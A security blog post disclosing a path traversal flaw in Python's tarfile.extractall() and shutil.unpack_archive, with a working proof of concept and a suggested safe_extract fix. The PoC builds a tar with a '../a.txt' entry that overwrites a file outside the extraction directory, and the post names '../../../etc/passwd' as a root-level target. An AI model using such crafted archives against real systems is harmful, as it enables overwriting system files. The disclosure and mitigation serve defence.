Kevin K Kien

Path traversal vulnerability in tarfile.extractall()

28 Oct 2024

Summary

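While learning CodeQL, I came across the function tarfile.extractall(), which extracts every entry of a tar archive. Looking further into this function, I found that it allows arbitrary file writes on the system: when no extraction filter is applied, entry names are joined to the destination directory without any check that the result stays inside it.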

Example: suppose poc.tar contains a single entry named ../../../etc/passwd. When poc.tar is extracted, that entry is written outside the destination directory, so /etc/passwd can be overwritten if the extracting process runs as root.
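The path arithmetic behind this example can be checked without touching the filesystem. The sketch below is illustrative only: resolved_target and escapes are hypothetical helpers, /home/user/out is an assumed extraction directory, and posixpath is used so the result is the same on any platform.

```python
import posixpath


def resolved_target(extract_dir: str, member_name: str) -> str:
    """Return the normalized path a member name points to under extract_dir."""
    return posixpath.normpath(posixpath.join(extract_dir, member_name))


def escapes(extract_dir: str, member_name: str) -> bool:
    """Return True if the member would land outside extract_dir."""
    base = posixpath.normpath(extract_dir)
    target = resolved_target(base, member_name)
    # commonpath compares whole path components, not characters
    return posixpath.commonpath([base, target]) != base


print(resolved_target("/home/user/out", "../../../etc/passwd"))  # /etc/passwd
print(escapes("/home/user/out", "../../../etc/passwd"))          # True
print(escapes("/home/user/out", "docs/readme.txt"))              # False
```

Three ".." components are enough here because the assumed directory is three levels deep; a real archive would typically carry more of them than needed.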

POC

To demonstrate the vulnerability, I will write a Python PoC that extracts an archive and overwrites a file a.txt with the content "hacked!!!". First, I create the target file at ahihi/a.txt.

mkdir ahihi
echo "file a.txt" > ahihi/a.txt
ubuntu@ip-172-31-22-90:$ cat ahihi/a.txt 
file a.txt

Next, create poc.tar containing a single entry named ../a.txt:

import tarfile

# Write the payload that will replace a.txt
with open('evil_file.txt', 'w') as f:
    f.write('hacked!!!')

# Store the payload in the archive under the traversal name '../a.txt'
with tarfile.open('poc.tar', 'w') as tar:
    tar.add('evil_file.txt', arcname='../a.txt')
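Before extracting, it can help to confirm that the archive really stores the traversal name. The following is a minimal sketch, not part of the original PoC: build_sample_archive and member_names are hypothetical helpers, and the archive is built in memory with the same entry name rather than read from poc.tar.

```python
import io
import tarfile


def build_sample_archive() -> bytes:
    """Build an in-memory tar with a single entry named '../a.txt'."""
    payload = b"hacked!!!"
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        info = tarfile.TarInfo(name="../a.txt")
        info.size = len(payload)
        tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


def member_names(archive: bytes) -> list:
    """Return the entry names exactly as they are stored in the archive."""
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r") as tar:
        return tar.getnames()


print(member_names(build_sample_archive()))  # ['../a.txt']
```

For an archive on disk, the same listing is available from the command line with python3 -m tarfile -l poc.tar.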

With poc.tar in place, the following script (poc.py, run from ahihi/poc) extracts the archive into the current directory and then checks for a.txt in the parent ahihi folder:

import os
import tarfile

extract_dir = '.'
os.makedirs(extract_dir, exist_ok=True)

print(f"Before extraction, does 'a.txt' exist? {'a.txt' in os.listdir('..')}")

with tarfile.open('poc.tar', 'r') as tar:
    tar.extractall(path=extract_dir)

print(f"After extraction, was 'a.txt' overwritten? {'a.txt' in os.listdir('..')}")

Run poc.py:

ubuntu@ip-172-31-22-90:ahihi/poc$ python3 poc.py 
Before extraction, does 'a.txt' exist? True
After extraction, was 'a.txt' overwritten? True

The existence check printed by the script cannot show whether the file actually changed, so I check the content of ahihi/a.txt directly:

ubuntu@ip-172-31-22-90:ahihi/poc$ cat ../a.txt 
hacked!!!

Done! The file outside the extraction directory was overwritten.
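The whole PoC can also be reproduced in a throwaway directory, comparing the file content before and after extraction instead of only checking that the file exists. This is a sketch under assumptions: reproduce is a hypothetical helper, the directory layout mirrors ahihi/poc inside a temporary folder, and on Python builds that support extraction filters it explicitly requests the unfiltered 'fully_trusted' behaviour so the result does not depend on the interpreter's default.

```python
import io
import os
import tarfile
import tempfile


def reproduce() -> tuple:
    """Return (content_before, content_after) of a file outside the extraction dir."""
    payload = b"hacked!!!"
    with tempfile.TemporaryDirectory() as root:
        target = os.path.join(root, "a.txt")       # plays the role of ahihi/a.txt
        extract_dir = os.path.join(root, "poc")    # plays the role of ahihi/poc
        os.makedirs(extract_dir)
        with open(target, "w") as f:
            f.write("file a.txt")
        with open(target) as f:
            before = f.read()

        # Build the malicious archive in memory
        buf = io.BytesIO()
        with tarfile.open(fileobj=buf, mode="w") as tar:
            info = tarfile.TarInfo(name="../a.txt")
            info.size = len(payload)
            tar.addfile(info, io.BytesIO(payload))
        buf.seek(0)

        # Request the legacy, unfiltered behaviour where filters exist
        kwargs = {}
        if hasattr(tarfile, "fully_trusted_filter"):
            kwargs["filter"] = "fully_trusted"
        with tarfile.open(fileobj=buf, mode="r") as tar:
            tar.extractall(path=extract_dir, **kwargs)

        with open(target) as f:
            after = f.read()
    return before, after


print(reproduce())
```

Nothing outside the temporary directory is touched, which makes this variant safer to run than the version that writes into the parent of the working directory.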

Recommendation: when extracting tar files from untrusted sources, do not call tarfile.extractall() directly. Validate every member path first, for example with a wrapper like this:

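import os
import tarfile

def safe_extract(tar, path=".", members=None):
    # Resolve the destination first so relative paths such as "." compare correctly
    base = os.path.realpath(path)
    for member in tar.getmembers():
        member_path = os.path.realpath(os.path.join(base, member.name))
        # commonpath compares whole path components; commonprefix only compares characters
        if os.path.commonpath([base, member_path]) != base:
            raise Exception("Attempted Path Traversal in Tar File")
    # Note: this checks member names only; symlink and hardlink members need separate handling
    tar.extractall(path, members=members)

# use safe_extract instead of extractall
extract_dir = '.'
with tarfile.open('poc.tar') as tar:
    safe_extract(tar, extract_dir)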

The shutil library

The shutil library also calls tarfile.extractall() to unpack tar archives, so shutil.unpack_archive can be exploited in the same way:

import os
import shutil

extract_dir = '.'
os.makedirs(extract_dir, exist_ok=True)

# Use shutil.unpack_archive to extract file
shutil.unpack_archive('malicious.tar', extract_dir)

print(f"After extraction, was 'a.txt' overwritten? {'a.txt' in os.listdir('..')}")